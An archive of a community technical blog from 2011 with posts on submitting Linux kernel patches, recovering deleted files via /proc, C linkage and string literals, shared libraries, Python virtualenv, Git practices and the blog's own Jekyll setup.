"David S. Miller" <davem@davemloft.net> (maintainer:NETWORKING [GENERAL],commit_signer:118/147=80%)
Eric Dumazet <eric.dumazet@gmail.com> (commit_signer:32/147=22%)
"Michał Mirosław" <mirq-linux@rere.qmqm.pl> (commit_signer:21/147=14%)
Jiri Pirko <jpirko@redhat.com> (commit_signer:15/147=10%)
Ben Hutchings <bhutchings@solarflare.com> (commit_signer:9/147=6%)
netdev@vger.kernel.org (open list:NETWORKING [GENERAL])
linux-kernel@vger.kernel.org (open list)
The addresses given as output are those where we will send our email. But, before sending the first email, we will have to configure git send-email. For example, adding the following lines to ~/.gitconfig will ensure that you can use Gmail as a SMTP server for sending the patch email.
[sendemail]
smtpencryption = tls
smtpserver = smtp.gmail.com
smtpuser = yourname@gmail.com
smtpserverport = 587
Now, we can send the email. We will have to manually fill in the --to and --cc options or we can use a list of sed commands as suggested by the Chromium wiki. In our case we will do it manually just to exemplify all steps, in real life it will be better to use scripts whenever it is possible.
git send-email --to=netdev@vger.kernel.org \
> --cc=linux-kernel@vger.kernel.org \
> --cc=... 0001-Speedup-proc-net-dev-filling.patch
0001-Speedup-proc-net-dev-filling.patch
Who should the emails appear to be from? [Mihai Maruseac <mihai.maruseac@rosedu.org>]
Emails will be sent from: Mihai Maruseac <mihai.maruseac@rosedu.org>
Message-ID to be used as In-Reply-To for the first email?
....
After several more lines of output your mail will be sent. I have responded with the default entries to the above questions but the last one is very relevant, as we will see next.
After the mail is sent, it will appear on patchwork and on the mailing lists. You will wait until someone looks through your mail and analyzes your patch. Then, the patch can be applied or someone can report some problems to you. If there are some problems, you will go back and solve them and will resend the patch using the above methodology. This time, you will answer the Message-ID question with the ID taken from the first email. In our case, the patch was not accepted from the start and we had to reiterate. Thus, we answered that question with the ID taken from the initial patch: <1318412950-22014-1-git-send-email-mmaruseac@ixiacom.com>. Until the final patch was accepted I needed to send several versions.
Even though this lasted a whole week, the feeling I got when it was finally accepted was awesome. You will feel it too after sending the first few patches.
As a recommended link before the end of the article, make sure you listen the YouTube video of Greg KH about contributing upstream.
27 November 2011 10:00 PM
17 November 2011
A process is an instance of a binary executable file. This means that when you ‘run’ a binary, the code from the storage media is copied into the system’s memory, more precisely, into the process’ virtual memory space. From a single binary, several processes can be spawned.
The virtual memory of a process, made up of pages, is mapped to several things, like shared objects(libraries), shared memory, stack and heap space, read-only space and executable space. A good way to view what is mapped to what is with the pmap utility, or by just looking in the /proc directory hierarchy. The /proc/$PID/maps file (where $PID is the process ID of the targeted process) has the page mappings. Also in /proc/$PID, you can find other useful files, like the exe file that contains a symlink to the executable or the fd directory that contains symlinks to all the files opened as file descriptors in a process.
Except useful information, what can we get out of the procfs? Here is a situation that has been known to happen. You are in a console, with your bash shell, and you manage to delete some important files, like /bin/bash. Without that executable, you cannot run new shells and on a restart, your system will be inaccessible. What can you do?
The code of your bash is no longer on the hard drive, but it is in the virtual memory of the process you are currently running. You can find out what’s the PID of the current shell instance using $$ enviroment variable . Knowing that, you can cd to the /proc/$$ and access the content of the exe file there.
Although the exe file is shown as a link to the original file that is now deleted (thus the link should be broken), if you cat it, you will get its binary content. In fact, all the original binary file. Here is the step by step process:
/bin # md5sum bash
e116963c760727bf9067e1cb96bbf7d3 bash
/bin # rm bash
/bin # echo $$
5051
/bin # cd /proc/$$
/proc/5051 # ls -la exe
lrwxrwxrwx 1 root root 0 2011-11-15 23:47 exe -> /bin/bash (deleted)
/proc/5051 # cat maps
[snip]
00f9e000-00f9f000 rw-p 0001c000 08:01 263123 /lib/i386-linux-gnu/ld-2.13.so
08048000-0810c000 r-xp 00000000 08:01 284760 /bin/bash (deleted)
0810c000-0810d000 r--p 000c3000 08:01 284760 /bin/bash (deleted)
0810d000-08112000 rw-p 000c4000 08:01 284760 /bin/bash (deleted)
[snip]
/proc/5051 # cat exe>/bin/bash_rescued
/proc/5051 # cd -
/bin # md5sum bash_rescued
e116963c760727bf9067e1cb96bbf7d3 bash_rescued
/bin # chmod +x bash_rescured
/bin # mv bash_rescured bash
What other things can we rescue? How about a file that was opened by a process? For example, a video file, opened by a player:
alexj@hathor ~ $ md5sum movie.ogv
9f701e645fd55e1ae8d35b7671002881 movie.ogv
alexj@hathor ~ $ vlc movie.ogv &
[1] 6487
alexj@hathor ~ $ cd /proc/6487/fd
alexj@hathor /proc/6487/fd $ ls -la |grep movie
lr-x------ 1 alexj alexj 64 2011-11-16 00:11 23 -> /home/alexj/movie.ogv
alexj@hathor /proc/6487/fd $ rm /home/alexj/movie.ogv
alexj@hathor /proc/6487/fd $ ls -la |grep movie
lr-x------ 1 alexj alexj 64 2011-11-16 00:11 23 -> /home/alexj/movie.ogv (deleted)
alexj@hathor /proc/6487/fd $ cp 23 /home/alexj/movie_rescued.ogv
alexj@hathor /proc/6487/fd $ md5sum /home/alexj/movie_rescued.ogv
9f701e645fd55e1ae8d35b7671002881 /home/alexj/movie_rescued.ogv
These things are possible because the instances of the files are still kept and used by the kernel. The VFS (the Virtual File System) still has references to the inodes of the files. They won’t be released until the processes will be finished.
Thanks to razvand and ddvlad for the idea of this article.
17 November 2011 10:00 PM
08 October 2011
The idea for this post came from Virgil’s comment on char[] versus char* entry. We will dig into some of C’s extern keyword internals by means of examples and then analyze the differences between extern char* and extern char[].
extern is a storage class specifier, indicating that the actual storage of a variable or the definition of a function is located elsewhere, typically in another source file.
Let’s start with a simple example:
helper.c
int sample = 42; /* definition */
main.c
extern int sample; /* declaration */
int main(void)
{
printf("sample = %d\n", sample);
}
Having obtained the corresponding object files helper.o and main.o we link them together into an executable named main. We will use the nm tool to check the symbols from each object file:
$ nm helper.o
00000000 D sample
$ nm main.o
U sample
00000000 T main
Notice that the symbol sample is only declared in main.c but not defined there. In the linking phase, the linker searches throughout all linked object files and finds out that the actual storage for sample is defined in helper.c. As a result our main executable will print value 42 declared in helper.c external file:
$./main
sample = 42
Now let’s see how the compiler behaves if the types for cross-referenced variables do not match:
foo.c
char *foo = "Hello";
main.c
void foo(void);
int main(void)
{
foo();
return 0;
}
$ gcc -Wall -c foo.c -o foo.o
$ gcc -Wall -c main.c -o main.o
$ gcc -o main main.o foo.o
$ ./main
Segmentation fault
Functions are by default extern, hence the declaration of symbol foo in main.c file allows the compiler to create main.o object file without errors or warnings. Anyhow, the linker does not check the type of symbol foo; thus, running the main executable results in a function call into an non-executable memory area.
Finally, let’s analyze if we can use a pointer and an array interchangeably between 2 source files.
First try. The file main.c declares an extern array of chars, leaving it to the linker to find the actual storage area defined for it. File pointer.c defines a pointer to a memory area holding a string literal. At link time, the symbol str from main.c is bound to a memory area representing the address of a string.
pointer.c
char *str = "1234";
char a = 'A'; /* memory guards */
char b = 'B';
char c = 'C';
main.c
extern char str[];
int main(void)
{
printf("%s\n", str);
return 0;
}
By compiling and linking main.c and pointer.c together we get main executable.
$ ./main
\�ABC
Notice how the array str is mapped to a memory area where an address is stored. The printf function will display raw data until a \0 is encountered. Fortunately, because of our guarding arrays, printing stops after showing some garbage and string ABC.
Second try. The file main.c declares a pointer to a memory area holding one or more characters. The linker will associate str from main.o with the storage defined by str array from array.o.
array.c
char str[] = "1234";
main.c
extern char *str;
int main(void)
{
printf("%s\n", str);
return 0;
}
By compiling and linking together these programs we notice that running the main executable results in a crash.
$ ./main
Segmentation fault
Let’s use GDB to see the reason:
$gdb ./main
(gdb) b main
Breakpoint 1 at 0x8048385: file main2.c, line 6.
(gdb) run
Breakpoint 1, main () at main2.c:6
6 printf("%s\n", str);
(gdb) p str
$1 = 0x34333231 Address 0x34333231 out of bounds
One can notice that the value of the pointer str is the content of array str. This content is an invalid address dereferenced by the pointer, resulting in the delivery of the dreaded SIGSEGV signal.
08 October 2011 09:00 PM
02 October 2011
This article aims to shed some light on the topic of library management with insight on the linker and loader. The ldconfig command, for example, is heavily used in Linux, though unknown to some of users.
A library is a collection of object files “meshed” together in another file. Its benefit is avoiding “reimplementing the wheel”. Once one has implemented a given set of functionalities, he/she may store those in a library file; this file is distributed to others and used in various software projects. Libraries are heavily used in all modern operating systems; the greater part of packages in Linux distributions are library packages. One can barely imagine being able to do any kind of development without the presence of the C Standard Library on the local system.
Linking and Loading
A library is said to be “linked” together with other library files or object files into an executable. The executable integrates all required components from library files, avoiding the need of implementing these components from scratch.
Linking is thus the process where external references in each module (object file) are resolved; that is, undefined functions are now looked in other linked modules or library files and their code is used in the executable. The linker is the application responsible for resolving and integrating functions in the end executable file.
With respect to the phase when linking occurs, we differentiate between three types of linking:
- static linking
- load-time dynamic linking
- run-time dynamic linking
The above nomenclature is specific to MSDN (load-time dynamic linking and run-time dynamic linking) but it’s a good depiction of any system using dynamic linking.
When using static linking, required library function code is inserted into the executable at link-time. Link-time refers to the moment when the linker process (ld) is invoked (typically wrapped by the gcc command). The result is an executable that comprises all required code to create a process.
When using dynamic linking, the linker process does not integrate code from the library. It simply creates stubs in the executable code stating what library file should be looked for that function. The actual “linking”, that is the “integration” of code in the executable, is done later.
Depending on the “later” part of dynamic linking, we differentiate between two types of linking. Load-time is when a process is created from an executable; the loader is responsible for “transforming” an executable into a process (actually, it’s not a transformation, but an instantiation). Run-time is the time while the process is running (using memory space, running code on the CPU etc.).
For load-time dynamic linking, the linking is done at load-time. That is, when running the executable (./myexec) and when the process is created, code from the library is mapped into memory and then referred to by the newly created process. For run-time dynamic linking, a specialized API allows the developer to load the library code into memory and, on demand, use specific functions.
Library types
Modern OSes such as Windows, Linux, Mac OS X and other Unices use two types of libraries, strongly related to the types of linking shown above: static libraries and dynamic libraries. Static libraries are used in conjunction with static linking, while dynamic libraries with load-time/run-time dynamic linking.
Static libraries use the .a extension on Unix and .lib on Windows. Each time some modules are linked against a library file, static linking is enabled and code for functions used is copied into the executable file.
ar rc libtest.a module1.o module2.o
gcc -o myexec exec.o -L. -l test
Dynamic libraries are called shared-object library on Unix and use the .so extension on Unix. On Windows, they are called dynamic-link libraries and use the .dll extensions. If a shared-object library is linked against a module, only references to the library are filled, no actual code is copied; that step is done later on (either at load-time or run-time).
In order to use a shared-object library for load-time linking, one would simply pass it as an argument to the linker:
gcc -share -fPIC -o libtest.so module1.o module2.o
gcc -o myexec exec.o -L. -l test
LD_LIBRARY_PATH=. ./myexec
When the loader creates a new process (LD_LIBRARY_PATH=. ./myexec), the library (libtest.so) is mapped into memory and necessary function code is accessed.
The use of run-time linking requires a specialized API for loading needed function code while the process is running: dlopen & friends. A sample is shown below:
double (*cosine)(double);
handle = dlopen ("libm.so", RTLD_LAZY);
cosine = dlsym(handle, "cos");
printf ("%f\n", (*cosine)(2.0));
Unlike static and load-time dynamic linking, run-time dynamic linking doesn’t require the presence of a library argument to the link command (that is -L.
-ltest).
Advantages of a certain type of library (static or dynamic) are disadvantages for the other one and vice versa.
Static library-generated executables have increased portability. All code is inserted into the executable such that, moving it on a different platform doesn’t require the presence of that library. These executables tend to be faster as no additional overhead is implied during load-time or run-time.
Dynamic library-generated executables have two main advantages: they are smaller in size and library files have a smaller memory footprint. The first advantage is due to not copying function code at link time: only references are added to the executable without additional code. The second advantage is stated in the Unix name for dynamic libraries: shared-object libraries. A library may be mapped in memory and all processes that use the library would use the same code. Thus, 50 processes that use the C standard library would require a single instance of the library to be mapped in memory.
Library Management
When discussing about library management, we are talking about dynamic libraries. This is due to the fact that, when using the library code (either at load-time or run-time), the loader needs to know where to find the requested libraries.
The Linux loader is called ld-linux.so. As stated in the man page: “The programs ld.so and ld-linux.so find and load the shared libraries needed by a program, prepare the program to run, and then run it.” The loader needs to lookup shared libraries in order to run the program and instantiate a process.
Bear in mind that the -L. option passed to GCC when doing linking is only used at link-time. It’s used to locate the library at link-time, not at load-time or run-time.
In order to configure the loader to lookup libraries for dynamic linking in a given folder (for example, the current folder – .), there are two main options: using the LD_LIBRARY_PATH environment variable or the ldconfig command.
The LD_LIBRARY_PATH variable is a list of colon delimited folders where libraries are searched. It must be set when the loader is invoked – that is, when running the executable:
export LD_LIBRARY_PATH=.
./myexec
Using the LD_LIBRARY_PATH variable is excellent for testing. It does however pose two disadvantages: it does not allow persistent configuration and it may suffer from security vulnerabilities similar to the PATH environment variable.
The configuration approach is the use of the ldconfig command. ldconfig is used to populate the library list cache file /etc/ld.so.cache. The cache file is read by the loader to search for libraries. On Debian-based systems, every time you install a library, ldconfig is run to populate the cache file.
In order to incorporate a new folder in the library search path, one may resort to a persistent configuration or a temporary one. For a temporary run, simply pass the new folder to ldconfig:
razvan@einherjar:~/code$ /sbin/ldconfig -p | grep libtest
razvan@einherjar:~/code$ sudo /sbin/ldconfig /home/razvan/code/
razvan@einherjar:~/code$ /sbin/ldconfig -p | grep libtest
libtest.so (libc6,x86-64) => /home/razvan/code/libtest.so
For a persistent, configuration, one would need to edit the configuration file and/or folder for ldconfig, namely /etc/ld.so.conf and /etc/ld.so.conf.d/. Simply add a new folder in the configuration file and run ldconfig.
When using dlopen & friends, the same kind of configurations may be used: LD_LIBRARY_PATH, temporary use of ldconfig and persistent use of /etc/ld.so.conf.
Conclusion and Further Info
Extensive information about the actions used by the loader to use dynamic libraries are found in man pages: ld-linux.so, ldconfig and dlopen & friends.
John R. Levine’s “Linkers & Loaders” is an extensive depiction of linkers, loaders, libraries and the load process.
Proper knowledge of library management on a Linux based system relies on good understanding of the linking and loading processes and library types. Make sure you understand the advantages and disadvantages of each approach and choose the one most suitable to your specific needs.
02 October 2011 09:00 PM
24 September 2011
This article is a quick guide to setting up a Python work environment. It walks you through installing Python with some basic package management tools (distribute, pip, virtualenv), setting up projects, and installing packages.
Bootstrapping
First of all we need to have a working Python interpreter. You want to install the latest release of 2.7 for now (September 2011). Python 3 is gathering momentum but many libraries don’t support it yet.
-
In most Linux distributions, and in Mac OS, some Python is already installed. You may, of course, install a different one from scratch. For Mac OS, the homebrew version is highly recommended.
-
On Windows you install a pre-compiled release from http://python.org/download/.
-
To install from source, you need a C compiler, and a tarball from http://python.org/download/. The usual ./configure; make; make
install should work just fine. Consider installing into a separate folder, e.g. ./configure --prefix=/usr/local/Python-2.7, so you can easily remove it at some point in the future.
Now, the typical mistake is to declare victory, and use this Python installation for everything. In time, you want to use various libraries, so you install them on top of Python. Eventually you get a version conflict (some project requires a library which is too new for another project). Fortunately there is a better way: virtualenv.
The command-line examples use $MYPYTHON as placeholder for the Python installation path. This can be /usr for a Linux distribution install, /usr/local for default manual installation, /usr/local/Cellar/python/2.7.2 for mac Homebrew, or even C:\Python27 on Windows.
If you’re on Linux, and use a Python package from the distribution, it’s a good bet they have virtualenv too. For Debian, Ubuntu and Fedora, the name is python-virtualenv. This may be outdated, so if you experience problems, check the version and consider installing the latest one (see below).
In a fresh Python installation, to get virtualenv, we need to install distribute and pip first. distribute is an older package manager, and pip is newer and more powerful, but it depends on the older one to do heavy lifting. So, download distribute_setup.py, and, assuming you installed Python in a folder called $MYPYTHON, do the following:
> $MYPYTHON/bin/python distribute_setup.py
> $MYPYTHON/bin/easy_install pip
> $MYPYTHON/bin/pip install virtualenv
If everything worked out fine, you should have a script called virtualenv in $MYPYTHON/bin, and you can safely remove distribute_setup.py and distribute-x.y.z.tar.gz.
That’s all you normally install in the global Python folder. Maybe throw in some commonly-used, slow-to-change, takes-a-while-to-compile package like PIL or SciPy, or the odd manually-installed kits on Windows, but everything else goes into a virtualenv.
Virtual insanity
Say you want to work on WoUSO, and the documentation tells you that you need to install Django. The very first thing you do is create a virtualenv. We’ll use $MYENV as placeholder for the path to a new folder where you want to work:
> $MYPYTHON/bin/virtualenv $MYENV
virtualenv will create the folder, write some files, then run off and get distribute and pip, it should all take a few seconds. When it’s done, you have $MYENV/bin/python, which is a fully functional Python interpreter. Next to it, there is $MYENV/bin/pip, which you can now use to install things:
> $MYENV/bin/pip install Django
This will go to PyPI, look for a package named Django, and install the latest version. The installation happens inside $MYENV, in the lib/python2.7/site-packages subfolder. This Django doesn’t affect the original Python installation or any other virtualenvs you create. Of course, multiple virtualenvs can have different versions of Django.
Bits and pieces
Now, if you start happily creating many virtualenvs, installing a lot of packages, you’ll be downloading the same files over and over again. Fortunately, pip can be configured to cache the downloads:
> cat ~/.pip/pip.conf
[global]
download_cache = ~/.pip/cache
Depending on the setup, sometimes you have to deal with globally-installed packages, for example if you’re using the Python from a Linux distribution. It’s still possible to create a virtualenv that ignores those packages by passing the --no-site-packages option to virtualenv. This simply leaves out the global site-packages folder from Python’s import path.
Some projects include a requirements.txt file in their source tree, which lists dependencies. You install these with pip install -r
requirements.txt. Writing your own requirements.txt is easy: each line is a set of arguments for one invocation of pip. Or simply run pip
freeze, it generates a list of all the installed packages and their versions.
When you get tired of typing $MYENV/bin/something all the time, you may want to activate the virtualenv. This is a fancy name which simply means that $MYENV/bin is prepended to your current $PATH (and your $PS1 is enhanced):
> . $MYENV/bin/activate
(myenv)> # "python" invokes "$MYENV/bin/python"
(myenv)> deactivate
> # back to the original shell environment
If you find yourself working on a package, the kind that has setup.py and installs with pip, you want to install the package in “edit” mode. Check out the source tree, then (assuming you’re in the same folder with setup.py) run pip install -e .. This will install the package in-place. Technically, a link is made in site-packages that extends Python’s import path to find your package, any dependencies in setup.py are installed, and scripts are installed in $MYENV/bin, if the package has any.
Further reading
These wonderful tools are available on PyPI, the Python Package Index. Most of them have good documentation that explains more features that did not fit in this article. Also, remember docs.python.org (behold the table of contents), where you can find documentation on the language, a nice tutorial, and excellent documentation for the standard library.
24 September 2011 09:00 PM
11 September 2011
Git is an excellent SCM (source code management system). I use it for a plethora of tasks such as managing code, scripts, LaTeX files, config files, Org-Mode files. I try to base all my actions on text files such that it could be managed through Git.
In this post I wish to share some of the knowledge and skills I’ve gathered throughout the time of using Git. I am novice myself in many aspects of using Git, but I feel confident of my basic usage skill and good practices.
My aim is to present tips and good practices that allow using Git at its value and conforming to recommendations. This is not a tutorial or a comprehensive view of Git. In case you are looking for that I recommend the excellent Gitimmersion tutorial and the Pro Git Book.
An important aspect to have in mind is the data model that Git uses. While most SCMs use changesets to manage commits, Git uses snapshots. Each commit is a snapshot of the entire project; it is not a set of file patches. Bear this in mind when using Git commands and playing around with commits. You may also check this tutorial for a more thorough presentation.
Configuring Git
The first step of using Git is configuring your identity and preferences, as highlighted by most tutorials. The recommended practice is to configure Git at system level (using the --global option):
git config --global user.name "Razvan Deaconescu"
git config --global user.email "razvan.deaconescu@cs.pub.ro"
git config --global color.ui auto
I recommend issuing the above commands each time you are using an account that will make use of Git commands.
In case you want a different configuration (another email address, for example) for a given repository, just issue the above commands (sans the --global option) while in that repository.
A situation may arise when you want to create a commit (or a series of commits) that use different user information. This may happen when you and a friend have access to a common account, and you want to separate your commits form hers/his (although run from the same account). There are two situations and approaches to this:
-
Situation: You want to use a different identity for all (or most) commits in a shell session (such as an SSH login session). Solution: Define the GIT_AUTHOR_NAME and GIT_AUTHOR_EMAIL environment variables:
export GIT_AUTHOR_NAME="Mighty McWolf"
export GIT_AUTHOR_EMAIL="mighty@mcwolf.org"
-
Situation: You want to use a different identity for a single commit. Solution: Use the --author option when committing:
git commit --author "Mighty McWolf <mighty@mcwolf.org>"
Commits
Everything in Git revolves around commits. A commit is a basic unit of information that you submit to Git for handling. Git stores each commit and links it to other commits such that you see a commit history, get back to a previous state, create a branch, watch the commit tree, update certain commits, create tags and many others. As mentioned above, a commit represents a snapshot of the entire project.
A basic rule, that applies to all other SCMs, is that each commit must keep the repository in a compilable state. That is, if one would checkout to a random place in the commit history, he/she would still be able to compile the source code. Make sure the project is in a compilable state when issuing your commit.
While the repository needs to be in a compilable state, it need not run perfectly. In fact it may end up in “Segmentation fault” or other critical errors. That’s no problem; it’s not achievable (not possible actually) to have a clean repository where each commit would break nothing. Do not be afraid to break the application when issuing a commit as long as its in a compilable state. If the application breaks, another commit will fix it; an impatient contributor could very well revert to a previous commit and create a branch from there. Moreover, trying to keep the application running, may force you to disobey the next recommendation.
Another important recommendation, heavily stressed in Git but probably insisted on in other SCMs, is creating small, atomic commits. Each commit should do one thing and do it well. A commit should not use a message such as “Update everything.” or “Fix plenty of errors.” Rather, each fix should go into a separate commit. This would make it very easy for a reviewer to analyze and diff your commit and, possibly, isolate a bug that you may have introduced. If your commit ranges a whole bunch of features that introduce multiple bugs, isolating those bugs and fixing them is a pain.
So, remember: Create small atomic commits that keep the repository in a compilable state.
Commit Messages
When your commit is ready, you’ll issue the git commit command and either use the configured editor or the -m option to write the commit message. Either way there’s a basic set of recommendations you should follow when writing a commit message.
-
Keep it short. Ideally, your commit message should consist of at most 50 characters. In case your message is longer, break it into sentences, and leave a blank line between the 50 characters message and the rest. The rationale, as mentioned in the git commit manpage, is that the first line is used as an email subject line by various tools.
-
Use present tense when issuing a commit. This ensures “compatibility” with messages used by tools such as git merge.
-
Write sentences not descriptions, similar to good code comments. Use capital letter, use verbs and end with dot.
Tim Pope writes about what makes a model Git commit message.
Creating and Updating Commits
Remember that your commits should be small: do one thing, do one thing well.
What happens when you’ve made a lot of changes and you want to create a commit? You need to “split” your changes in multiple commits. For that you use git add -i (-i for interactive). When using -i Git inquires you about the commit. Most likely you would:
- choose the
patch option (press p or 5)
- choose the file you want to “split”
- press
Enter
- answer
y or n to include/exclude certain chunks
- press
q to quit
At this point, the modified file would be found both in the staging area and in the “changes” area. The staging area would solely consist of the chunks you selected previously.
What if you’ve just created a commit and realized that the commit message may be wrong or that there should have been another hunk or file committed? In this case you would use git commit --amend. As the options says, this gives you the possibility of amending the commit, be it to update the commit message or to add certain files: just issue git
add (or git add -i) and then invoke git commit --amend. By adding --author, the --amend option allows you to even update the author identity.
What if you want to update a commit that is not the latest? If the commit has been pushed in the remote repository, then it’s quite complicated and not recommended. However, if the commit is local and hasn’t been pushed, you may used git rebase -i. You have to specify the commit id where rebasing will take place. Afterwards you will be prompted with an editor screen where you can select which of the commits that have been created. Usually you would replace the pick string with edit and Git will pass you through all commits.
For each commit you will most likely issue some git add commands, then git commit --amend and, finally, git rebase --continue.
As long as the commits are local (not pushed to the remote repository), all is fine.
Stashing
On certain occasions, you may need to run some commit update commands (such as git rebase, git pull) but retain some “dirty data” in the repository. As Git disallows the existence of non-committed data in such occasions, the solution is stashing.
Stashing means you temporarily store your data in a specialized zone such that it would not get in the way of the above commands. In order to stash local changes, you would simply issue the git stash command. After updates have occurred, use git stash pop to bring back changes and revert to the original “dirty state”.
Ignoring Data
Some files or data have to be ignored from being commit, while others need to be ignored because of process specifics or use preference.
As a rule of thumb, a repository should only manage text files; no binary files such as image files, compressed files, object files, executable files. If you are a web developer or someone who has to work extensively with image files, the above rule wouldn’t apply 100%. You should however, only commit source code files and files that cannot be compiled or linked from other files.
Such that a good practice is to create a top-level .gitignore file in your repository and define files to be ignored. A basic .gitignore file is shown below:
sample .gitignore
*~
*.swp
*.swo
*.o
*.obj
*.a
*.so
*.dll
*.lib
*.gz
*.bz2
*.zip
Optional .gitignore files may be created in subfolders of the repository according to need.
.gitignore files are committed in the repository and their exclusion rules are applied to all contributors. A situation may arise when you create a folder that you want to reside in your repository clone but never get committed. For example a lib folder consisting of libraries you are linking against for testing purposes. As it is binary data it shouldn’t be committed, and, as you are the only one using it, it should be ignored. You could add it to the .gitignore file but that would complicate it. The best solution is to edit the .git/info/exclude file. It follows the same syntax as .gitignore files but is local to your clone.
The above solutions are not useful in a specific situation: you want to ignore changes you make to a file that is being tracked. .gitignore and .git/info/exclude only ignore non-tracked files; they can’t be used on files that are being tracked. Your solution lies in running the command git update-index --assume-unchanged abc.txt. Issuing this command ensures that any local updates to the abc.txt file are not going to be taken into account when creating subsequent commits.
A large part of your interaction with Git is analyzing commits, diffing, checking commit history etc. Visual tools are very important and provide you an intuitive view of the repository commits. Such tools are Git GUI, gitk and giggle. A nice tool, running on an ncurses-based interface is tig.
Apart from that, several commands are heavily used throughout your work in Git, from a “view point of view” so to say:
-
git status provides you with information regarding the current branch, information in staging area, “dirty” information etc.;
-
git log provides you with a CLI view of the commit history; an useful option is --oneline providing you with a one commit on one line view;
-
git diff presents a diff between various states of the repository;
-
without any option, git diff it shows changes in the working directory (versus HEAD);
-
a single option to git diff is a commit ID or tag that is diffed against HEAD;
-
two options tor git diff are two commit IDs or tags to be diffed.
An useful option to git diff is --cached. This option presents a diff between HEAD and data in staging area. It’s useful to check everything is in order before creating a commit.
Cleaning Up
An important activity is cleaning up files in different states (staging, modified, non-tracked).
The list below highlights various user requirements and solutions to those predicaments:
-
You want to clear any updates you’ve done to a file that’s being tracked:
git checkout file.name
-
You want to remove a file from the staging area and place it in the modified state; you want to build your commit in a different manner:
git reset HEAD file.name
-
You want to clear non-tracked files from the working clone:
git clean file.name
-
You want to clear all non-tracked files from the working clone:
git clean -f
-
You want to clear all changes and revert to the initial state of HEAD (by changes I’m referring to tracked files changes; this doesn’t affect non-tracked files):
git reset --hard
Other Resources
The Internet is filled with tutorials and tips regarding the use of Git. Google is one of your best friends to provide you a rapid solution to a problem. Through Google, I’ve found a lot of answers on Stack Overflow.
As mentioned above, I find the Git Immersion tutorial to be very well presented and easy to follow and the Pro Git Book as a good technical presentation of Git and its features. An excellent site, consisting of a plethora of very nicely presented tips is > learn git one commit at a time">> learn git one commit at a time">git ready.
As a funny link, I recommend you access Commit Message Generator.
11 September 2011 09:00 PM
03 September 2011
This post will shed some light on the differences between arrays and pointers specifically when it comes about referencing string literals. We will base our discussion on the following two programs:
array.c
char a[] = "ROSEdu";
int main(void)
{
a[0] = 'r';
printf("%s\n", a);
return 0;
}
pointer.c
char *p = "ROSEdu";
int main(void)
{
*p = 'r';
printf("%s\n", p);
return 0;
}
Program array.c defines an array of char whose elements are initialized with character string literals, while pointer.c defines a pointer to char and initializes it with the address of a memory area holding a string literal. Notice array a and pointer p allocations in the image above. Can you make a guess about size of a and size of p? Next, both programs modify the first character of the string literal ROSEdu. Are these two programs equivalent? At the first glance the answer seems to be positive, but let’s have a minute and actually run the code.
$ ./array
rOSEdu
$ ./pointer
Segmentation fault
While we could modify array a, our program was killed attempting to modify string literal pointed by p. We will now have a look at the generated assembly code and notice the section where string literal ROSEdu is stored.

$ gcc -S array.c -o array.s
$ cat array.s
.globl a
.data
.type a, @object
.size a, 7
a:
.string "ROSEdu"
$ gcc -S pointer.c -o pointer.s
$ cat pointer.s
globl p
.section .rodata
.LC0:
.string "ROSEdu"
.data
.type p, @object
.size p, 4
p:
.long .LC0
.text
We can see that array a is stored in data section, which is writable and there is no problem when it is modified. On the other hand, we can notice that p is a pointer stored in data section but it points to a read only memory location, thus accessing it results in ‘Segmentation Fault’.
C99 standards (Section 6.7.8) states that:
- contents of the array a is modifiable.
- if an attempt is made to use pointer p to modify the contents of the array, the behaviour is undefined.
So now we see why pointer.c program crashed. gcc decided to store string literal pointed by p into read only data section. One must remark that this is not mandatory, and its implementation dependant.
We invite you to answer following questions:
- What is the sizeof(p) and sizeof(a) in our previous examples?
- What happens if variables a and p are declared on the stack?
- Is it possible for the following expression
(const char []){"ROSEdu"} == "ROSEdu" to yield true?
03 September 2011 09:00 PM
07 June 2011
This blog started as an idea of Răzvan Deaconescu based on the fact that several members of ROSEdu already had technical blogs (linked here on the right) but they were not updated on a regular basis. Having a community blog solves this problem and allows for a greater diversity among the topics presented. Without further ado, this is it.
Excluding this article, the blog will contain technical articles, tips and tricks, quick hacks to solve some problems and some articles explaining different things related to IT. Here we will present the infrastructure of the site.
It is created using the Jekyll static site generator. When this was started there was a little discussion about the back-end and why we should choose a static site generator instead of using Wordpress or Blogspot or similar frameworks. The problem with the “classic” CMSs was that they have a (relatively) high demand of resources and that you’ll always have to use the latest version of the software to prevent attacks.
Using a static site there’s no database layer, no code which may contain exploitable bugs. Thus, everything is safe. Also, since only basic HTML pages need to be served, there’s little memory and CPU usage when serving the website.
Since we will be posting code to this blog, a framework allowing a nice and pleasant look of it was desired. And Wordpress has several plugins but it isn’t always fun working with them.
But, the really important aspect, the one which ended the debate, was the fact that we are able to separate the content from the actual site, we can keep a back-up copy of the content1. Moreover, we can use a Git repository to hold the configuration and the content. We use a gitolite repository for the actual content with two branches:
- one for the actual content
- one for contributors where the actual content gets posted for review
After the review is done, the actual publishing is done by cherry-picking the good commits to the first branch. A git hook is responsible for doing the actual posting.
The content is written in a simple text file either using the Markdown format or the Textile format. Jekyll is responsible for translating it into the actual HTML page and some server configuration takes care of actual publishing of the pages.
There’s one downside to this, though. Comments and other things that need dynamic code are hard to set up. Yet, there are solutions there too. For example, we use the Intense Debate platform for comments. The alternative, Disqus could also be used but we settled on the first.
The actual design of the site was done by learning and experimenting with CSS until we were satisfied with the looks. Having a static generator means that we had to do the entire design by hand but this can be a good thing since we no longer depend on the themes that come with a classic CMS.
Thanks go to: Alex Juncu (setting up the Apache stuff), Răzvan Deaconescu (coming up with this idea and setting up the initial repository), Mihai Maruseac (configuration, layout and workflow)
If you wish to contribute, contact us at techblog@rosedu.org.
07 June 2011 09:00 PM
04 June 2011
This week was a good week for coding, and the best part about it: most of my changes are now in s-c’s upstream trunk.
I started out trying to populate s-c database with only a few applications; this meant updating the update-software-center tool, and also changing some bits on the database update module. I was glad to discover that some functionality I have planned to develop in week 6 (parsing AppStream app-data xmls) was already there, thus making my job easier
After that, work continued by abstracting backend parts, such as InstallBackend and TransactionsWatcher, and also isolating as much as posible apt and apt_pkg usage. I have then expanded the PackageInfo abstraction to implement a dictionary like interface, containing _Package objects (before that, apt.Package were returned). It took some small steps, and sometimes mistakes from my side, but in the end, I guess I have got it done right. Work still needs to be done regarding usage of candidate and installed properties (which currently are apt.Version objects), and also on AptCache try_install_and_*depends methods (this should be either abstracted, either made apt-backend specific.
